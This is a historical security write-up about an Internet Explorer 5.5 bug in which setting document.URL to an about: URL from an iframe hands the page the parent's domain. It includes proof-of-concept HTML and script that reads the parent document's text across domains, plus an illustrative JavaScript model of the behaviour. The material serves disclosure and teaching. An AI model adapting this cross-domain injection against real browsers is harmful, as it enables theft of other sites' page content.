I was exploring a subtle difference between location.href = "about:blank" and document.URL = "about:blank" when called from inside an iframe. They behave differently in terms of which security domain the resulting about:blank page inherits. In IE 5.5, the about: protocol could carry arbitrary text after the colon, which made it possible to inject a script tag that ran in the parent’s domain. That full exploit only worked on IE 5.5, but the underlying document.URL domain-transfer quirk was still present and worth noting in later versions as a potential bridge to other techniques.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_IE55_documentURLAbout</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>xDom_IE55_documentURLAbout</h2>
</center>
<hr />
<br />
I know, I know. IE 5.5 is not "the issue" now, but this little bug is interesting because it "almost" works on IE6 and IE7 and it
opens a little bridge that -maybe- can be used for other things.<br /><br />
Usually, when you change the URL of an IFRAME to about:blank from inside the iframe, the new page keeps the domain of the document that changed
the URL. For example, if you set location.href = "about:blank" from inside an iframe, the domain of that "about:blank" will continue
to belong to the same iframe.<br /><br />

Now, the point here is that if you change the URL (to about:blank) using document.URL instead of location.href, the domain
changes to that of its parent.<br /><br />

So, in the old days of IE 5.5, when you were able to use about:anyText, you could simply write a script from inside an IFRAME
and access its parent document. These days you can't do the same thing, but you can still change the URL to about:blank with
the parent domain.
<hr />
The iframe has a file with only this instruction:<br /><br />
<b>document.URL</b> ="about:&lt;script&gt;alert(parent.document.body.innerText)&lt;\/script&gt;";<br /><br />
Of course, it will work only on IE5.5, but -again- I think we should fix the document.URL = "about:blank" problem anyway because it may be a bridge to new holes.
<center>
<iframe src="http://differentdomain/anotherdomain.html" width="100" height="100"></iframe>
</center>
</body>
</html>

anotherdomain.html (hosted on a different domain, loaded in the iframe):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_IE55_documentURLAbout</title></head>
<body>
This file should be located on a different domain than the top window.
<script language="JavaScript">
document.URL ="about:<script>alert(parent.document.body.innerText)<\/script>";
</script>
</body>
</html>

The key distinction is that document.URL = "about:..." (an IE-specific writable property) caused the resulting about: page to inherit the parent document’s security domain rather than keeping the iframe’s own domain — the opposite of what location.href does. On IE 5.5, about: accepted arbitrary text as content, so you could write about:<script>...</script> and have that script execute in the parent’s domain with full access to parent.document. On IE 6 and 7 the about:anyText feature was removed, but the domain-assignment quirk remained as a residual concern.
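
The three behaviours described above (IE 5.5, IE 6/7, and the patched rule) can be compared side by side in a small model. This is an added example, not code from the original page or from any browser; the profile names, the `navigateSelf` function, the `http://parent.example` origin and the "fixed" rule are assumptions made for illustration.

```javascript
// Constructed model, not browser code: each profile captures the two behaviours
// the page describes. The "fixed" profile is an assumption about the patched rule.
const PROFILES = {
  ie55:  { aboutAnyText: true,  documentUrlTakesParent: true  },
  ie6_7: { aboutAnyText: false, documentUrlTakesParent: true  },
  fixed: { aboutAnyText: false, documentUrlTakesParent: false },
};

// Simulates a script inside the iframe navigating its own frame to an about: URL.
// api is "location.href" or "document.URL".
function navigateSelf(profileName, api, url, frameOrigin, parentOrigin) {
  const p = PROFILES[profileName];
  if (!p) throw new Error("unknown profile: " + profileName);
  if (!url.startsWith("about:")) throw new Error("model covers about: URLs only");

  // Origin assignment: location.href keeps the navigating frame's domain;
  // document.URL hands over the parent's domain where the quirk exists.
  const takesParent = api === "document.URL" && p.documentUrlTakesParent;
  const origin = takesParent ? parentOrigin : frameOrigin;

  // Content: only IE 5.5 treated the text after "about:" as markup.
  const text = url.slice("about:".length);
  const scriptRuns = p.aboutAnyText && /<script/i.test(text);

  return {
    origin,
    scriptRuns,
    // Parent's domain given to a page the parent never authored: the residual quirk.
    domainTransferred: origin === parentOrigin && frameOrigin !== parentOrigin,
    // A cross-domain read needs both script execution and the parent's origin.
    readsParent: scriptRuns && origin === parentOrigin,
  };
}

// Constructed sample origins; the payload string is the one from the page's test file.
const FRAME = "http://differentdomain";
const PARENT = "http://parent.example";
const PAYLOAD = "about:<script>alert(parent.document.body.innerText)<\/script>";

for (const name of Object.keys(PROFILES)) {
  for (const api of ["location.href", "document.URL"]) {
    console.log(name, api, navigateSelf(name, api, PAYLOAD, FRAME, PARENT));
  }
}
```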

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.